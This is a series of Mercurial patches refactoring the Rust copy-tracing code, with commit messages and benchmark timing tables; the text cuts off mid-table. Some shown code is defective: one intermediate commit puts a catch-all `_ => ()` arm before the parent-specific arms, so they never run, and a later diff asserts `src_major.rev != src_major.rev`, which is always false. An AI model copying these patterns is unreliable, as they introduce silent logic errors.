Differential Revision: https://phab.mercurial-scm.org/D9647 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -414,49 +414,37 @@ p2, ), // will be None if the vertex is not to be traversed }; - if let Some(parent_copies) = p1_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( + // combine it with data for that revision + let p1_copies = match p1_copies { + None => None, + Some(parent_copies) => Some(add_from_changes( &mut path_map, &parent_copies, &changes, Parent::FirstParent, rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - if let Some(parent_copies) = p2_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( + )), + }; + let p2_copies = match p2_copies { + None => None, + Some(parent_copies) => Some(add_from_changes( &mut path_map, &parent_copies, &changes, Parent::SecondParent, rev, - ); - - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. 
- Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - )), - }; - } - match copies { - Some(copies) => { - all_copies.insert(rev, copies); - } - _ => {} + )), + }; + let copies = match (p1_copies, p2_copies) { + (None, None) => None, + (c, None) => c, + (None, c) => c, + (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( + &path_map, rev, p2_copies, p1_copies, &changes, + )), + }; + if let Some(c) = copies { + all_copies.insert(rev, c); } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608109294 -3600 # Wed Dec 16 10:01:34 2020 +0100 # Node ID d2ad44b8ef6a63a7b74a122975a6dc6b8b26caaa # Parent f8bdc8329d7718d86976c8b601a67c0c02dd0303 copies-rust: extract the processing of a single copy information This will make it easy to process copy from both p1 and p2 in the same `add_from_changes` call. Differential Revision: https://phab.mercurial-scm.org/D9648 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -503,31 +503,14 @@ for action in changes.iter_actions(parent) { match action { Action::Copied(path_dest, path_source) => { - let dest = path_map.tokenize(path_dest); - let source = path_map.tokenize(path_source); - let entry; - if let Some(v) = base_copies.get(&source) { - entry = match &v.path { - Some(path) => Some((*(path)).to_owned()), - None => Some(source.to_owned()), - } - } else { - entry = Some(source.to_owned()); - } - // Each new entry is introduced by the children, we - // record this information as we will need it to take - // the right decision when merging conflicting copy - // information. See merge_copies_dict for details. 
- match copies.entry(dest) { - Entry::Vacant(slot) => { - let ttpc = CopySource::new(current_rev, entry); - slot.insert(ttpc); - } - Entry::Occupied(mut slot) => { - let ttpc = slot.get_mut(); - ttpc.overwrite(current_rev, entry); - } - } + add_one_copy( + current_rev, + &mut path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ); } Action::Removed(deleted_path) => { // We must drop copy information for removed file. @@ -545,6 +528,44 @@ copies } +// insert one new copy information in an InternalPathCopies +// +// This deal with chaining and overwrite. +fn add_one_copy( + current_rev: Revision, + path_map: &mut TwoWayPathMap, + copies: &mut InternalPathCopies, + base_copies: &InternalPathCopies, + path_dest: &HgPath, + path_source: &HgPath, +) { + let dest = path_map.tokenize(path_dest); + let source = path_map.tokenize(path_source); + let entry; + if let Some(v) = base_copies.get(&source) { + entry = match &v.path { + Some(path) => Some((*(path)).to_owned()), + None => Some(source.to_owned()), + } + } else { + entry = Some(source.to_owned()); + } + // Each new entry is introduced by the children, we + // record this information as we will need it to take + // the right decision when merging conflicting copy + // information. See merge_copies_dict for details. 
+ match copies.entry(dest) { + Entry::Vacant(slot) => { + let ttpc = CopySource::new(current_rev, entry); + slot.insert(ttpc); + } + Entry::Occupied(mut slot) => { + let ttpc = slot.get_mut(); + ttpc.overwrite(current_rev, entry); + } + } +} + /// merge two copies-mapping together, minor and major /// /// In case of conflict, value from "major" will be picked, unless in some # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608542656 -3600 # Mon Dec 21 10:24:16 2020 +0100 # Node ID a34cd9aa33234c67d658c1a487111e7ca376a025 # Parent d2ad44b8ef6a63a7b74a122975a6dc6b8b26caaa copies-rust: yield both p1 and p2 copies in `ChangedFiles.actions()` Instead of filtering the relevant parent inside the ChangedFiles method, we now yield all copies information and let the caller do the filtering. Soon, the filtering will be replaced by dispatching. Differential Revision: https://phab.mercurial-scm.org/D9649 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -107,7 +107,8 @@ Removed(&'a HgPath), /// The parent ? children edge introduce copy information between (dest, /// source) - Copied(&'a HgPath, &'a HgPath), + CopiedFromP1(&'a HgPath, &'a HgPath), + CopiedFromP2(&'a HgPath, &'a HgPath), } /// This express the possible "special" case we can get in a merge @@ -246,10 +247,9 @@ } /// Return an iterator over all the `Action` in this instance. 
- fn iter_actions(&self, parent: Parent) -> ActionsIterator { + fn iter_actions(&self) -> ActionsIterator { ActionsIterator { changes: &self, - parent: parent, current: 0, } } @@ -283,7 +283,6 @@ struct ActionsIterator<'a> { changes: &'a ChangedFiles<'a>, - parent: Parent, current: u32, } @@ -291,10 +290,6 @@ type Item = Action<'a>; fn next(&mut self) -> Option<Action<'a>> { - let copy_flag = match self.parent { - Parent::FirstParent => P1_COPY, - Parent::SecondParent => P2_COPY, - }; while self.current < self.changes.nb_items { let (flags, file, source) = self.changes.entry(self.current); self.current += 1; @@ -302,8 +297,10 @@ return Some(Action::Removed(file)); } let copy = flags & COPY_MASK; - if copy == copy_flag { - return Some(Action::Copied(file, source)); + if copy == P1_COPY { + return Some(Action::CopiedFromP1(file, source)); + } else if copy == P2_COPY { + return Some(Action::CopiedFromP2(file, source)); } } return None; @@ -500,17 +497,33 @@ current_rev: Revision, ) -> InternalPathCopies { let mut copies = base_copies.clone(); - for action in changes.iter_actions(parent) { + for action in changes.iter_actions() { match action { - Action::Copied(path_dest, path_source) => { - add_one_copy( - current_rev, - &mut path_map, - &mut copies, - &base_copies, - path_dest, - path_source, - ); + Action::CopiedFromP1(path_dest, path_source) => { + match parent { + _ => (), // not the parent we are looking for + Parent::FirstParent => add_one_copy( + current_rev, + path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ), + }; + } + Action::CopiedFromP2(path_dest, path_source) => { + match parent { + _ => (), //not the parent we are looking for + Parent::SecondParent => add_one_copy( + current_rev, + path_map, + &mut copies, + &base_copies, + path_dest, + path_source, + ), + }; } Action::Removed(deleted_path) => { // We must drop copy information for removed file. 
# HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608111968 -3600 # Wed Dec 16 10:46:08 2020 +0100 # Node ID 600f8d510ab617dfe00586a751ddb2e23ffcd774 # Parent a34cd9aa33234c67d658c1a487111e7ca376a025 copies-rust: process copy information of both parents at the same time This avoids a double iteration and opens the way to a better handling of deletion. That better handling of deletion is the core reason we are doing this refactoring. Differential Revision: https://phab.mercurial-scm.org/D9650 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -323,15 +323,6 @@ pub type RevInfoMaker<'a, D> = Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; -/// enum used to carry information about the parent → child currently processed -#[derive(Copy, Clone, Debug)] -enum Parent { - /// The `p1(x) → x` edge - FirstParent, - /// The `p2(x) → x` edge - SecondParent, -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -393,7 +384,6 @@ // We will chain the copies information accumulated for the parent with // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. 
- let mut copies: Option<InternalPathCopies> = None; // Retrieve data computed in a previous iteration let p1_copies = match p1 { NULL_REVISION => None, @@ -412,26 +402,8 @@ ), // will be None if the vertex is not to be traversed }; // combine it with data for that revision - let p1_copies = match p1_copies { - None => None, - Some(parent_copies) => Some(add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - )), - }; - let p2_copies = match p2_copies { - None => None, - Some(parent_copies) => Some(add_from_changes( - &mut path_map, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - )), - }; + let (p1_copies, p2_copies) = + chain_changes(&mut path_map, p1_copies, p2_copies, &changes, rev); let copies = match (p1_copies, p2_copies) { (None, None) => None, (c, None) => c, @@ -489,41 +461,47 @@ /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes( +fn chain_changes( path_map: &mut TwoWayPathMap, - base_copies: &InternalPathCopies, + base_p1_copies: Option<InternalPathCopies>, + base_p2_copies: Option<InternalPathCopies>, changes: &ChangedFiles, - parent: Parent, current_rev: Revision, -) -> InternalPathCopies { - let mut copies = base_copies.clone(); +) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { + // Fast path the "nothing to do" case. + if let (None, None) = (&base_p1_copies, &base_p2_copies) { + return (None, None); + } + + let mut p1_copies = base_p1_copies.clone(); + let mut p2_copies = base_p2_copies.clone(); for action in changes.iter_actions() { match action { Action::CopiedFromP1(path_dest, path_source) => { - match parent { - _ => (), // not the parent we are looking for - Parent::FirstParent => add_one_copy( + match &mut p1_copies { + None => (), // This is not a vertex we should proceed. 
+ Some(copies) => add_one_copy( current_rev, path_map, - &mut copies, - &base_copies, + copies, + base_p1_copies.as_ref().unwrap(), path_dest, path_source, ), - }; + } } Action::CopiedFromP2(path_dest, path_source) => { - match parent { - _ => (), //not the parent we are looking for - Parent::SecondParent => add_one_copy( + match &mut p2_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( current_rev, path_map, - &mut copies, - &base_copies, + copies, + base_p2_copies.as_ref().unwrap(), path_dest, path_source, ), - }; + } } Action::Removed(deleted_path) => { // We must drop copy information for removed file. @@ -532,13 +510,26 @@ // propagate this information when merging two // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - copies.entry(deleted).and_modify(|old| { - old.mark_delete(current_rev); - }); + match &mut p1_copies { + None => (), + Some(copies) => { + copies.entry(deleted).and_modify(|old| { + old.mark_delete(current_rev); + }); + } + }; + match &mut p2_copies { + None => (), + Some(copies) => { + copies.entry(deleted).and_modify(|old| { + old.mark_delete(current_rev); + }); + } + }; } } } - copies + (p1_copies, p2_copies) } // insert one new copy information in an InternalPathCopies # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608112740 -3600 # Wed Dec 16 10:59:00 2020 +0100 # Node ID 2076df13d00f809e6c4eeaf7636ca3813b708fdf # Parent 600f8d510ab617dfe00586a751ddb2e23ffcd774 copies-rust: refactor the "deletion" case We rearrange the code to single out the case where information need to be overwritten on both side of the merge. This open the way to better dealing with this case. 
Differential Revision: https://phab.mercurial-scm.org/D9651 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -510,22 +510,35 @@ // propagate this information when merging two // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - match &mut p1_copies { - None => (), - Some(copies) => { - copies.entry(deleted).and_modify(|old| { - old.mark_delete(current_rev); - }); - } + + let p1_entry = match &mut p1_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + let p2_entry = match &mut p2_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, }; - match &mut p2_copies { - None => (), - Some(copies) => { - copies.entry(deleted).and_modify(|old| { - old.mark_delete(current_rev); - }); + + match (p1_entry, p2_entry) { + (None, None) => (), + (Some(mut e), None) => { + e.get_mut().mark_delete(current_rev) } - }; + (None, Some(mut e)) => { + e.get_mut().mark_delete(current_rev) + } + (Some(mut e1), Some(mut e2)) => { + e1.get_mut().mark_delete(current_rev); + e2.get_mut().mark_delete(current_rev); + } + } } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608113218 -3600 # Wed Dec 16 11:06:58 2020 +0100 # Node ID d6d57bfc1a1b8c64dab69be7a846f12ec7f97efa # Parent 2076df13d00f809e6c4eeaf7636ca3813b708fdf copies-rust: record "overwritten" information from both side on delete With this change, we can ensure every (`dest`, `rev`) points to the same value, making a lots of comparison simpler. 
Differential Revision: https://phab.mercurial-scm.org/D9652 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -75,6 +75,19 @@ self.path = None; } + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete_with_pair(&mut self, rev: Revision, other: &Self) { + self.overwritten.insert(self.rev); + if other.rev != rev { + self.overwritten.insert(other.rev); + } + self.overwritten.extend(other.overwritten.iter().copied()); + self.rev = rev; + self.path = None; + } + fn is_overwritten_by(&self, other: &Self) -> bool { other.overwritten.contains(&self.rev) } @@ -535,8 +548,10 @@ e.get_mut().mark_delete(current_rev) } (Some(mut e1), Some(mut e2)) => { - e1.get_mut().mark_delete(current_rev); - e2.get_mut().mark_delete(current_rev); + let cs1 = e1.get_mut(); + let cs2 = e2.get(); + cs1.mark_delete_with_pair(current_rev, &cs2); + e2.insert(cs1.clone()); } } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608113465 -3600 # Wed Dec 16 11:11:05 2020 +0100 # Node ID b0a3ca02d17ad328a78fb4a1725f2437319f0059 # Parent d6d57bfc1a1b8c64dab69be7a846f12ec7f97efa copies-rust: implement PartialEqual manually Now that we know that each (dest, rev) pair has at most a unique CopySource, we can simplify comparison a lot. 
This "simple" step buys a good share of the previous slowdown back in some case: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 43.304637 s, 34.443661 s, -8.860976 s, × 0.7954, 90 µs/rev Full benchmark: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000043 s, +0.000000 s, × 1.0000, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000117 s, +0.000003 s, × 1.0263, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004937 s, 0.004892 s, -0.000045 s, × 0.9909, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000339 s, 0.000196 s, -0.000143 s, × 0.5782, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000050 s, +0.000001 s, × 1.0204, 50 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000202 s, 0.000117 s, -0.000085 s, × 0.5792, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000409 s, 0.000322 s, -0.000087 s, × 0.7873, 322 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011984 s, 0.011949 s, -0.000035 s, × 0.9971, 1991 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.050820 s, 0.050802 s, -0.000018 s, × 0.9996, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.087953 s, 0.088090 s, 
+0.000137 s, × 1.0016, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.062902 s, 0.062079 s, -0.000823 s, × 0.9869, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.679234 s, 0.635337 s, -0.043897 s, × 0.9354, 14 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013095 s, 0.013262 s, +0.000167 s, × 1.0128, 6631 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.120910 s, 0.120085 s, -0.000825 s, × 0.9932, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000087 s, 0.000085 s, -0.000002 s, × 0.9770, 42 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000110 s, +0.000003 s, × 1.0280, 55 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000186 s, 0.000177 s, -0.000009 s, × 0.9516, 59 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000754 s, 0.000743 s, -0.000011 s, × 0.9854, 82 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010443 s, 0.010168 s, -0.000275 s, × 0.9737, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015697 s, 0.015946 s, +0.000249 s, × 1.0159, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.063528 s, 0.062712 s, -0.000816 s, × 0.9872, 10 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.545515 s, 0.523832 s, -0.021683 s, × 0.9603, 7 µs/rev mozilla-central x_revs_x_added_0_copies 3697f962bb7b 7015fcdd43a2 : 2 revs, 0.000089 s, 0.000090 s, +0.000001 s, × 1.0112, 45 µs/rev mozilla-central x_revs_x000_added_0_copies dd390860c6c9 40d0c5bed75d : 8 revs, 0.000265 s, 0.000264 s, -0.000001 s, × 0.9962, 33 µs/rev mozilla-central x_revs_x_added_x_copies 8d198483ae3b 14207ffc2b2f : 9 revs, 0.000381 s, 0.000187 s, 
-0.000194 s, × 0.4908, 20 µs/rev mozilla-central x_revs_x00_added_x_copies 98cbc58cc6bc 446a150332c3 : 7 revs, 0.000672 s, 0.000665 s, -0.000007 s, × 0.9896, 95 µs/rev mozilla-central x_revs_x000_added_x000_copies 3c684b4b8f68 0a5e72d1b479 : 3 revs, 0.003497 s, 0.003556 s, +0.000059 s, × 1.0169, 1185 µs/rev mozilla-central x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073204 s, 0.071345 s, -0.001859 s, × 0.9746, 11890 µs/rev mozilla-central x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006482 s, 0.006551 s, +0.000069 s, × 1.0106, 4 µs/rev mozilla-central x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005066 s, 0.005078 s, +0.000012 s, × 1.0024, 123 µs/rev mozilla-central x000_revs_x000_added_x000_copies 7c97034feb78 4407bd0c6330 : 7839 revs, 0.065707 s, 0.065823 s, +0.000116 s, × 1.0018, 8 µs/rev mozilla-central x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.026800 s, 0.027050 s, +0.000250 s, × 1.0093, 43 µs/rev mozilla-central x0000_revs_xx000_added_x000_copies f78c615a656c 96a38b690156 : 30263 revs, 0.203856 s, 0.202443 s, -0.001413 s, × 0.9931, 6 µs/rev mozilla-central x00000_revs_x0000_added_x0000_copies 6832ae71433c 4c222a1d9a00 : 153721 revs, 1.293394 s, 1.261583 s, -0.031811 s, × 0.9754, 8 µs/rev mozilla-central x00000_revs_x00000_added_x000_copies 76caed42cf7c 1daa622bbe42 : 204976 revs, 1.698239 s, 1.643869 s, -0.054370 s, × 0.9680, 8 µs/rev mozilla-try x_revs_x_added_0_copies aaf6dde0deb8 9790f499805a : 2 revs, 0.000875 s, 0.000868 s, -0.000007 s, × 0.9920, 434 µs/rev mozilla-try x_revs_x000_added_0_copies d8d0222927b4 5bb8ce8c7450 : 2 revs, 0.000891 s, 0.000887 s, -0.000004 s, × 0.9955, 443 µs/rev mozilla-try x_revs_x_added_x_copies 092fcca11bdb 936255a0384a : 4 revs, 0.000292 s, 0.000168 s, -0.000124 s, × 0.5753, 42 µs/rev mozilla-try x_revs_x00_added_x_copies b53d2fadbdb5 017afae788ec : 2 revs, 0.003939 s, 0.001160 s, -0.002779 s, × 0.2945, 580 µs/rev 
mozilla-try x_revs_x000_added_x000_copies 20408ad61ce5 6f0ee96e21ad : 1 revs, 0.033027 s, 0.033016 s, -0.000011 s, × 0.9997, 33016 µs/rev mozilla-try x_revs_x0000_added_x0000_copies effb563bb7e5 c07a39dc4e80 : 6 revs, 0.073703 s, 0.073312 s, -0.000391 s, × 0.9947, 12218 µs/rev mozilla-try x000_revs_xx00_added_0_copies 6100d773079a 04a55431795e : 1593 revs, 0.006469 s, 0.006485 s, +0.000016 s, × 1.0025, 4 µs/rev mozilla-try x000_revs_x000_added_x_copies 9f17a6fc04f9 2d37b966abed : 41 revs, 0.005278 s, 0.005494 s, +0.000216 s, × 1.0409, 134 µs/rev mozilla-try x000_revs_x000_added_x000_copies 1346fd0130e4 4c65cbdabc1f : 6657 revs, 0.064995 s, 0.064879 s, -0.000116 s, × 0.9982, 9 µs/rev mozilla-try x0000_revs_x_added_0_copies 63519bfd42ee a36a2a865d92 : 40314 revs, 0.301041 s, 0.301469 s, +0.000428 s, × 1.0014, 7 µs/rev mozilla-try x0000_revs_x_added_x_copies 9fe69ff0762d bcabf2a78927 : 38690 revs, 0.285575 s, 0.297113 s, +0.011538 s, × 1.0404, 7 µs/rev mozilla-try x0000_revs_xx000_added_x_copies 156f6e2674f2 4d0f2c178e66 : 8598 revs, 0.085597 s, 0.085890 s, +0.000293 s, × 1.0034, 9 µs/rev mozilla-try x0000_revs_xx000_added_0_copies 9eec5917337d 67118cc6dcad : 615 revs, 0.027118 s, 0.027718 s, +0.000600 s, × 1.0221, 45 µs/rev mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 2.119204 s, 2.048949 s, -0.070255 s, × 0.9668, 21 µs/rev mozilla-try x0000_revs_x0000_added_x0000_copies e928c65095ed e951f4ad123a : 52031 revs, 0.701479 s, 0.685924 s, -0.015555 s, × 0.9778, 13 µs/rev mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 4.482399 s, 4.482891 s, +0.000492 s, × 1.0001, 12 µs/rev mozilla-try x00000_revs_x00000_added_0_copies dc8a3ca7010e d16fde900c9c : 34414 revs, 0.574082 s, 0.577633 s, +0.003551 s, × 1.0062, 16 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 4.480366 s, 4.397816 s, -0.082550 s, × 0.9816, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 
9126823d0e9c ca82787bb23c : 359344 revs, 4.369070 s, 4.370538 s, +0.001468 s, × 1.0003, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.592506 s, 1.570439 s, -0.022067 s, × 0.9861, 8 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 87.824489 s, 88.388512 s, +0.564023 s, × 1.0064, 386 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 43.304637 s, 34.443661 s, -8.860976 s, × 0.7954, 90 µs/rev private : 459513 revs, 33.853687 s, 27.370148 s, -6.483539 s, × 0.8085, 59 µs/rev Differential Revision: https://phab.mercurial-scm.org/D9653 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -16,7 +16,7 @@ type PathToken = usize; -#[derive(Clone, Debug, PartialEq)] +#[derive(Clone, Debug)] struct CopySource { /// revision at which the copy information was added rev: Revision, @@ -93,6 +93,21 @@ } } +// For the same "dest", content generated for a given revision will always be +// the same. +impl PartialEq for CopySource { + fn eq(&self, other: &Self) -> bool { + #[cfg(debug_assertions)] + { + if self.rev == other.rev { + debug_assert!(self.path == other.path); + debug_assert!(self.overwritten == other.overwritten); + } + } + self.rev == other.rev + } +} + /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608545745 -3600 # Mon Dec 21 11:15:45 2020 +0100 # Node ID 8fcf07e6bbb478d768e817e0387c81e582cdb978 # Parent b0a3ca02d17ad328a78fb4a1725f2437319f0059 copies-rust: make more use of the new comparison property We deal with the "both are the same" sooner and simplify the rest of the conditional. 
Differential Revision: https://phab.mercurial-scm.org/D9654 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -847,49 +847,31 @@ src_minor: &CopySource, src_major: &CopySource, ) -> (MergePick, bool) { - if src_major.rev == current_merge { - if src_minor.rev == current_merge { - if src_major.path.is_none() { - // We cannot get different copy information for both p1 and p2 - // from the same revision. Unless this was a - // deletion. - // - // However the deletion might come over different data on each - // branch. - let need_over = src_major.overwritten != src_minor.overwritten; - (MergePick::Any, need_over) - } else { - unreachable!(); - } - } else { - // The last value comes the current merge, this value -will- win - // eventually. - (MergePick::Major, true) - } + if src_major == src_minor { + (MergePick::Any, false) + } else if src_major.rev == current_merge { + // minor is different according to per minor == major check earlier + debug_assert!(src_minor.rev != current_merge); + + // The last value comes the current merge, this value -will- win + // eventually. + (MergePick::Major, true) } else if src_minor.rev == current_merge { // The last value comes the current merge, this value -will- win // eventually. 
(MergePick::Minor, true) } else if src_major.path == src_minor.path { + debug_assert!(src_major.rev != src_major.rev); // we have the same value, but from other source; - if src_major.rev == src_minor.rev { - // If the two entry are identical, they are both valid - debug_assert!(src_minor.overwritten == src_minor.overwritten); - (MergePick::Any, false) - } else if src_major.is_overwritten_by(src_minor) { + if src_major.is_overwritten_by(src_minor) { (MergePick::Minor, false) } else if src_minor.is_overwritten_by(src_major) { (MergePick::Major, false) } else { (MergePick::Any, true) } - } else if src_major.rev == src_minor.rev { - // We cannot get copy information for both p1 and p2 in the - // same rev. So this is the same value. - unreachable!( - "conflicting information from p1 and p2 in the same revision" - ); } else { + debug_assert!(src_major.rev != src_major.rev); let dest_path = path_map.untokenize(*dest); let action = changes.get_merge_case(dest_path); if src_minor.path.is_some() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608546031 -3600 # Mon Dec 21 11:20:31 2020 +0100 # Node ID aa19d60ac9747bcc0624a1c78b887f62c50bd0bd # Parent 8fcf07e6bbb478d768e817e0387c81e582cdb978 copies-rust: use simpler overwrite when value on both side are identical If the value are the same, their "overwritten" set is the same and we don't need to combine them. 
It helps our slower cases Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 86.722016 s, 80.828689 s, -5.893327 s, × 0.9320, 352 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 35.113727 s, 34.094064 s, -1.019663 s, × 0.9710, 89 µs/rev Full comparison with the previous revision below: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000043 s, 0.000043 s, +0.000000 s, × 1.0000, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000114 s, 0.000114 s, +0.000000 s, × 1.0000, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004899 s, 0.004899 s, +0.000000 s, × 1.0000, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000196 s, 0.000196 s, +0.000000 s, × 1.0000, 21 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000050 s, 0.000049 s, -0.000001 s, × 0.9800, 49 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000125 s, 0.000117 s, -0.000008 s, × 0.9360, 16 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000321 s, 0.000322 s, +0.000001 s, × 1.0031, 322 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.011948 s, 0.011856 s, -0.000092 s, × 0.9923, 1976 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 